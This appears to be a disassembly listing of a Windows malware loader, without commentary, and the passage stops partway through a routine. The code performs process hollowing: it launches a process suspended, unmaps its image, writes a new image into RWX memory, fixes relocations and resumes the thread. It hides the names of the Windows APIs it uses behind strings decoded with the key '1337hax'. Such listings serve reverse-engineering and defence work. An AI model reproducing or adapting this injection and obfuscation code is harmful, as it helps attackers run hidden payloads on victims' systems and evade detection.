var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
sub ecx, [eax+34h]
mov [ebp+var_8], ecx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, [eax+0A0h]
mov [ebp+var_4], ecx
loc_401A36: ; CODE XREF: sub_401A15+94�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx+4]
test eax, eax
jz short locret_401AAB
mov eax, [ebp+var_4]
add eax, 8
mov [ebp+var_14], eax
mov [ebp+var_10], 1
jmp short loc_401A5E
; ---------------------------------------------------------------------------
loc_401A57: ; CODE XREF: sub_401A15+8C�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_401A5E: ; CODE XREF: sub_401A15+40�j
mov eax, [ebp+var_4]
mov eax, [eax+4]
sub eax, 8
shr eax, 1
cmp [ebp+var_10], eax
ja short loc_401AA3
xor eax, eax
test eax, eax
jz short loc_401A99
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [eax]
mov eax, [ebp+var_14]
movzx eax, word ptr [eax]
and eax, 0FFFh
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov eax, [eax]
add eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [ecx], eax
loc_401A99: ; CODE XREF: sub_401A15+5D�j
mov eax, [ebp+var_14]
inc eax
inc eax
mov [ebp+var_14], eax
jmp short loc_401A57
; ---------------------------------------------------------------------------
loc_401AA3: ; CODE XREF: sub_401A15+57�j
mov eax, [ebp+var_14]
mov [ebp+var_4], eax
jmp short loc_401A36
; ---------------------------------------------------------------------------
locret_401AAB: ; CODE XREF: sub_401A15+2E�j
leave
retn
sub_401A15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AAD proc near ; CODE XREF: sub_401BD6+D9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push offset LibFileName ; "ntdll.dll"
call LoadLibraryA ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_401AE7
push [ebp+arg_4]
push [ebp+arg_0]
call dword_403188
neg eax
sbb eax, eax
inc eax
mov [ebp+var_4], eax
push [ebp+var_8]
call dword_40318C
loc_401AE7: ; CODE XREF: sub_401AAD+1B�j
mov eax, [ebp+var_4]
leave
retn
sub_401AAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AEC proc near ; CODE XREF: sub_401BD6+64�p
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_30 = byte ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 7Ch
push edi
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_74], 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_74]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
push [ebp+arg_0]
push 0
call dword_40319C
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_401BD0
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_10]
mov [eax], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+arg_4]
mov dword ptr [eax], 10007h
push [ebp+arg_4]
mov eax, [ebp+arg_C]
push dword ptr [eax]
call dword_403180
lea eax, [ebp+var_78]
push eax
push 4
push [ebp+arg_14]
mov eax, [ebp+arg_4]
mov eax, [eax+0A4h]
add eax, 8
push eax
mov eax, [ebp+arg_8]
push dword ptr [eax]
call dword_4031A0
mov eax, [ebp+arg_14]
mov eax, [eax]
mov [ebp+var_7C], eax
loc_401B91: ; CODE XREF: sub_401AEC+D5�j
push 1Ch
lea eax, [ebp+var_30]
push eax
push [ebp+var_7C]
mov eax, [ebp+arg_8]
push dword ptr [eax]
call dword_4031A8
test eax, eax
jz short loc_401BC3
mov [ebp+var_20], 10000h
cmp [ebp+var_20], 0
jz short loc_401BB8
jmp short loc_401BC3
; ---------------------------------------------------------------------------
loc_401BB8: ; CODE XREF: sub_401AEC+C8�j
mov eax, [ebp+var_7C]
add eax, [ebp+var_24]
mov [ebp+var_7C], eax
jmp short loc_401B91
; ---------------------------------------------------------------------------
loc_401BC3: ; CODE XREF: sub_401AEC+BB�j
; sub_401AEC+CA�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_7C]
sub ecx, [eax]
mov eax, [ebp+arg_18]
mov [eax], ecx
loc_401BD0: ; CODE XREF: sub_401AEC+47�j
mov eax, [ebp+var_14]
pop edi
leave
retn
sub_401AEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401BD6(LPCSTR lpString2, int, int, int, int, int)
sub_401BD6 proc near ; CODE XREF: sub_401E5B+3E�p
var_2E8 = byte ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
hMem = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_230 = dword ptr -230h
var_224 = dword ptr -224h
var_8 = dword ptr -8
var_4 = dword ptr -4
lpString2 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2E8h
or [ebp+var_2DC], 0FFFFFFFFh
push [ebp+arg_10]
mov eax, [ebp+arg_4]
push dword ptr [eax+34h]
push [ebp+lpString2] ; lpString2
call sub_401998
add esp, 0Ch
mov [ebp+hMem], eax
cmp [ebp+hMem], 0
jnz short loc_401C14
mov eax, [ebp+var_2DC]
jmp locret_401E59
; ---------------------------------------------------------------------------
loc_401C14: ; CODE XREF: sub_401BD6+31�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_2D4]
push eax
push [ebp+hMem]
call sub_401AEC
add esp, 1Ch
test eax, eax
jz loc_401E47
and [ebp+var_2E4], 0
mov eax, [ebp+arg_4]
mov eax, [eax+34h]
cmp eax, [ebp+var_2E0]
jnz short loc_401C96
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_10]
jb short loc_401C96
mov eax, [ebp+var_2E0]
mov [ebp+var_2E4], eax
lea eax, [ebp+var_2E8]
push eax
push 40h
push [ebp+var_4]
push [ebp+var_2E4]
push [ebp+var_2DC]
call dword_4031B0
jmp loc_401D2D
; ---------------------------------------------------------------------------
loc_401C96: ; CODE XREF: sub_401BD6+87�j
; sub_401BD6+8F�j
call sub_401987
test eax, eax
jz loc_401D2D
push [ebp+var_2E0]
push [ebp+var_2DC]
call sub_401AAD
pop ecx
pop ecx
test eax, eax
jz short loc_401CDC
push 40h
push 3000h
push [ebp+arg_10]
mov eax, [ebp+arg_4]
push dword ptr [eax+34h]
push [ebp+var_2DC]
call dword_4031D4
mov [ebp+var_2E4], eax
loc_401CDC: ; CODE XREF: sub_401BD6+E2�j
cmp [ebp+var_2E4], 0
jnz short loc_401D2D
push [ebp+arg_4]
call sub_4019E7
pop ecx
test eax, eax
jz short loc_401D2D
push 40h
push 3000h
push [ebp+arg_10]
push 0
push [ebp+var_2DC]
call dword_4031D4
mov [ebp+var_2E4], eax
cmp [ebp+var_2E4], 0
jz short loc_401D2D
push [ebp+var_2E4]
push [ebp+arg_C]
push [ebp+arg_4]
call sub_401A15
add esp, 0Ch
loc_401D2D: ; CODE XREF: sub_401BD6+BB�j
; sub_401BD6+C7�j ...
cmp [ebp+var_2E4], 0
jz loc_401E1D
lea eax, [ebp+var_2E8]
push eax
push 4
lea eax, [ebp+var_2E4]
push eax
mov eax, [ebp+var_230]
add eax, 8
push eax
push [ebp+var_2DC]
call dword_4031D8
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_2E4]
mov [eax+34h], ecx
lea eax, [ebp+var_2E8]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+var_2E4]
push [ebp+var_2DC]
call dword_4031D8
test eax, eax
jz short loc_401DF1
mov [ebp+var_2D4], 10007h
mov eax, [ebp+var_2E4]
cmp eax, [ebp+var_2E0]
jnz short loc_401DBB
mov eax, [ebp+arg_4]
mov eax, [eax+34h]
mov ecx, [ebp+arg_4]
add eax, [ecx+28h]
mov [ebp+var_224], eax
jmp short loc_401DCD
; ---------------------------------------------------------------------------
loc_401DBB: ; CODE XREF: sub_401BD6+1CF�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_2E4]
add ecx, [eax+28h]
mov [ebp+var_224], ecx
loc_401DCD: ; CODE XREF: sub_401BD6+1E3�j
lea eax, [ebp+var_2D4]
push eax
push [ebp+var_8]
call dword_4031CC
push [ebp+var_8]
call dword_4031C4
push [ebp+var_8]
call dword_403184
jmp short loc_401E1B
; ---------------------------------------------------------------------------
loc_401DF1: ; CODE XREF: sub_401BD6+1B7�j
push 0
push [ebp+var_2DC]
call dword_4031E8
push [ebp+var_8]
call dword_403184
push [ebp+var_2DC]
call dword_403184
or [ebp+var_2DC], 0FFFFFFFFh
loc_401E1B: ; CODE XREF: sub_401BD6+219�j
jmp short loc_401E47
; ---------------------------------------------------------------------------
loc_401E1D: ; CODE XREF: sub_401BD6+15E�j
push 0
push [ebp+var_2DC]
call dword_4031E8
push [ebp+var_8]
call dword_403184
push [ebp+var_2DC]
call dword_403184
or [ebp+var_2DC], 0FFFFFFFFh
loc_401E47: ; CODE XREF: sub_401BD6+6E�j
; sub_401BD6:loc_401E1B�j
push [ebp+hMem] ; hMem
call sub_4012E8
pop ecx
mov eax, [ebp+var_2DC]
locret_401E59: ; CODE XREF: sub_401BD6+39�j
leave
retn
sub_401BD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401E5B(int, int, LPCSTR lpString2, int)
sub_401E5B proc near ; CODE XREF: start+EF�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
lpString2 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
or [ebp+var_10], 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4016CA
add esp, 18h
test eax, eax
jz short loc_401EB5
push [ebp+arg_C] ; int
push [ebp+var_4] ; int
push [ebp+var_C] ; int
push [ebp+var_8] ; int
push [ebp+var_14] ; int
push [ebp+lpString2] ; lpString2
call sub_401BD6
add esp, 18h
mov [ebp+var_10], eax
push 4000h
push [ebp+var_4]
push [ebp+var_C]
call dword_4031AC
loc_401EB5: ; CODE XREF: sub_401E5B+2A�j
mov eax, [ebp+var_10]
leave
retn
sub_401E5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EBA proc near ; CODE XREF: start+2A�p
hLibModule = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push offset ModuleName ; "T;Y"
call GetModuleHandleA ; GetModuleHandleA
mov [ebp+var_8], eax
push offset aQlVpn5uNc ; "Q-PN5c"
call LoadLibraryA ; LoadLibraryA
mov [ebp+hLibModule], eax
push offset aKNek5uNc ; "[)EK5c"
call LoadLibraryA ; LoadLibraryA
mov [ebp+var_4], eax
push offset ProcName ; "l-@Cj"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031F0, eax
push offset aLzS@cja ; "l-@Cj"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031D4, eax
push offset aLBzfs ; "}+ZFs"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031B4, eax
push offset aSVxcvk ; "`\nXCv"
push [ebp+var_8] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_403188, eax
push offset aIykdo ; "|:yKd"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_40318C, eax
push offset aYNagvo ; "y:AGV"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_40319C, eax
push offset aLPc ; "}+]Pc"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_403180, eax
push offset aHlIepi ; "h>ePi"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031A0, eax
push offset aLzS@cjnumRu ; "l-@Cj}ؐU"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031A8, eax
push offset aLzS@cjmsjY ; "l-@Cj{ĶY}"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031B0, eax
push offset aM6sprt ; "m6Prt"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031D8, eax
push offset aIlPc ; "i+]Pc"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031CC, eax
push offset aHlSxgrSmn ; "h,XGRn"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031C4, eax
push offset aYv0qpjg ; "y0Pjg"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_403184, eax
push offset aNlBLgi ; "n-\\Lg"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031E8, eax
push offset aLzS@cjSmj ; "l-@Cjj"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031AC, eax
push offset aLAzagAb ; "}+ZAgπb"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031E4, eax
push offset aIlAzagAb ; "i+ZAgπb"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031BC, eax
push offset aIvIe ; "i:E"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_403194, eax
push offset aH3pzovo ; "h3ZOv"
push [ebp+var_8] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031C8, eax
push offset aH3ipaiIijJo ; "h3PAijҦo"
push [ebp+var_8] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_40317C, eax
push offset aH3lpve ; "h3PVE"
push [ebp+var_8] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_403190, eax
push offset aYNag@ ; "y:AG@"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031B8, eax
push offset aHlIskj ; "h>sKj"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031A4, eax
push offset aIlKNcm ; "i+\\Nc"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031EC, eax
push offset aLKNcp ; "}+\\Nc"
push [ebp+hLibModule] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031C0, eax
push offset aLFgtt ; "}+FGt"
push [ebp+var_4] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031DC, eax
push offset aHl8geghc ; "h8EGh"
push [ebp+var_4] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031D0, eax
push offset aHl8@gteIcH ; "h8@Gt͈ch"
push [ebp+var_4] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_403198, eax
push offset aHl8pymuMv ; "h8YMuЌv"
push [ebp+var_4] ; hModule
call GetProcAddress ; GetProcAddress
mov dword_4031E0, eax
cmp dword_4031F0, 0
jz loc_40226E
cmp dword_4031D4, 0
jz loc_40226E
cmp dword_4031B4, 0
jz loc_40226E
cmp dword_403188, 0
jz loc_40226E
cmp dword_40318C, 0
jz loc_40226E
cmp dword_40319C, 0
jz loc_40226E
cmp dword_403180, 0
jz loc_40226E
cmp dword_4031A0, 0
jz loc_40226E
cmp dword_4031A8, 0
jz loc_40226E
cmp dword_4031B0, 0
jz loc_40226E
cmp dword_4031D8, 0
jz loc_40226E
cmp dword_4031CC, 0
jz loc_40226E
cmp dword_4031C4, 0
jz loc_40226E
cmp dword_403184, 0
jz loc_40226E
cmp dword_4031E8, 0
jz loc_40226E
cmp dword_4031AC, 0
jz short loc_40226E
cmp dword_4031E4, 0
jz short loc_40226E
cmp dword_4031BC, 0
jz short loc_40226E
cmp dword_403194, 0
jz short loc_40226E
cmp dword_4031C8, 0
jz short loc_40226E
cmp dword_40317C, 0
jz short loc_40226E
cmp dword_403190, 0
jz short loc_40226E
cmp dword_4031B8, 0
jz short loc_40226E
cmp dword_4031A4, 0
jz short loc_40226E
cmp dword_4031EC, 0
jz short loc_40226E
cmp dword_4031C0, 0
jz short loc_40226E
cmp dword_4031DC, 0
jz short loc_40226E
cmp dword_4031D0, 0
jz short loc_40226E
cmp dword_403198, 0
jz short loc_40226E
cmp dword_4031E0, 0
jnz short loc_40227B
loc_40226E: ; CODE XREF: sub_401EBA+271�j
; sub_401EBA+27E�j ...
push [ebp+hLibModule] ; hLibModule
call FreeLibrary ; FreeLibrary
xor al, al
jmp short locret_40227D
; ---------------------------------------------------------------------------
loc_40227B: ; CODE XREF: sub_401EBA+3B2�j
mov al, 1
locret_40227D: ; CODE XREF: sub_401EBA+3BF�j
leave
retn
sub_401EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40227F proc near ; CODE XREF: start+25�p
push ebp
mov ebp, esp
push esi
push edi
push 9
push offset ModuleName ; "T;Y"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset ModuleName ; "T;Y"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aQlVpn5uNc ; "Q-PN5c"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aQlVpn5uNc ; "Q-PN5c"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aKNek5uNc ; "[)EK5c"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aKNek5uNc ; "[)EK5c"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset ProcName ; "l-@Cj"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset ProcName ; "l-@Cj"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aLzS@cja ; "l-@Cj"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLzS@cja ; "l-@Cj"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 12h
push offset aLBzfs ; "}+ZFs"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLBzfs ; "}+ZFs"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 14h
push offset aSVxcvk ; "`\nXCv"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aSVxcvk ; "`\nXCv"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aIykdo ; "|:yKd"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aIykdo ; "|:yKd"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aYNagvo ; "y:AGV"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aYNagvo ; "y:AGV"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aLPc ; "}+]Pc"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLPc ; "}+]Pc"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 11h
push offset aHlIepi ; "h>ePi"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aHlIepi ; "h>ePi"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aLzS@cjnumRu ; "l-@Cj}ؐU"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLzS@cjnumRu ; "l-@Cj}ؐU"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aLzS@cjmsjY ; "l-@Cj{ĶY}"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLzS@cjmsjY ; "l-@Cj{ĶY}"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 12h
push offset aM6sprt ; "m6Prt"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aM6sprt ; "m6Prt"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aIlPc ; "i+]Pc"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aIlPc ; "i+]Pc"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aHlSxgrSmn ; "h,XGRn"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aHlSxgrSmn ; "h,XGRn"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aYv0qpjg ; "y0Pjg"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aYv0qpjg ; "y0Pjg"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aNlBLgi ; "n-\\Lg"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aNlBLgi ; "n-\\Lg"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aLzS@cjSmj ; "l-@Cjj"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLzS@cjSmj ; "l-@Cjj"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aIlAzagAb ; "i+ZAgπb"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aIlAzagAb ; "i+ZAgπb"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aLAzagAb ; "}+ZAgπb"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLAzagAb ; "}+ZAgπb"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 5
push offset aIvIe ; "i:E"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aIvIe ; "i:E"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 11h
push offset aH3pzovo ; "h3ZOv"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aH3pzovo ; "h3ZOv"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 13h
push offset aH3ipaiIijJo ; "h3PAijҦo"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aH3ipaiIijJo ; "h3PAijҦo"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 1Eh
push offset aH3lpve ; "h3PVE"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aH3lpve ; "h3PVE"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aYNag@ ; "y:AG@"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aYNag@ ; "y:AG@"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 8
push offset aHlIskj ; "h>sKj"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aHlIskj ; "h>sKj"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Dh
push offset aLKNcp ; "}+\\Nc"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLKNcp ; "}+\\Nc"
or ecx, 0FFFFFFFFh
